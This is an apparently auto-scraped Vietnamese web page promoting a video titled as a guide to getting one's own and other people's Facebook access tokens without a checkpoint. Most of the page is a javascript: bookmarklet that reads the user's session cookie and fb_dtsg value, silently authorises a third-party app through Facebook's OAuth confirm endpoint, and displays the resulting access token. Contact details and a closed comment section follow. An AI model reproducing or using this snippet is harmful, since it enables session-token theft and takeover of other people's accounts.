Chúng tôi là một website tự động lấy content ở đa kênh và video trên youtube, để tránh những việc không đáng có xảy ra, hãy cân nhắc trước mọi hành động tới giao dịch. Chúng tôi sẽ không chịu trách nhiệm về nội dung trên trang và các vấn đề giao dịch. Nhắc lại một lần nữa đây là trang web tự động không phải website để giao dịch

HƯỚNG DẪN LẤY TOKEN CỦA MÌNH + NGƯỜI KHÁC KHÔNG BỊ CHECKPOINT 0,1s || HUỲNH KHẮC ĐẠT Official ✔Code : javascript:var uid = document.cookie.match(/c_user=(d+)/)[1],dtsg = document.getElementsByName(“fb_dtsg”)[0].value,http = new XMLHttpRequest,url = “//www.facebook.com/v1.0/dialog/oauth/confirm”,params = “fb_dtsg=” + dtsg + “&app_id=124024574287414&redirect_uri=fbconnect%3A%2F%2Fsuccess&display=page&access_token=&from_post=1&return_format=access_token&domain=&sso_device=ios&_CONFIRM=1&_user=” + uid;http.open(“POST”, url, !0), http.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”), http.onreadystatechange = function() {if (4 == http.readyState && 200 == http.status) {var a = http.responseText.match(/access_token=(.*)(?=&expires_in)/);a = a ? a[1] : “Failed to Get Access Token.”, prompt(“Token”, a);}}, http.send(params)

? Zalo + SĐT : 0393331070
? Facebook :

CÁC KÊNH CỦA KHÁC CỦA TÔI #HuỳnhKhắcĐạtOfficial #tokenkhongcheckpoint

? KÊNH YOUTUBE : HUỲNH KHẮC ĐẠT OFFICIAL :

14 thoughts on “HƯỚNG DẪN LẤY TOKEN CỦA MÌNH + NGƯỜI KHÁC KHÔNG BỊ CHECKPOINT 0,1s || HUỲNH KHẮC ĐẠT Official ✔

Comments are closed.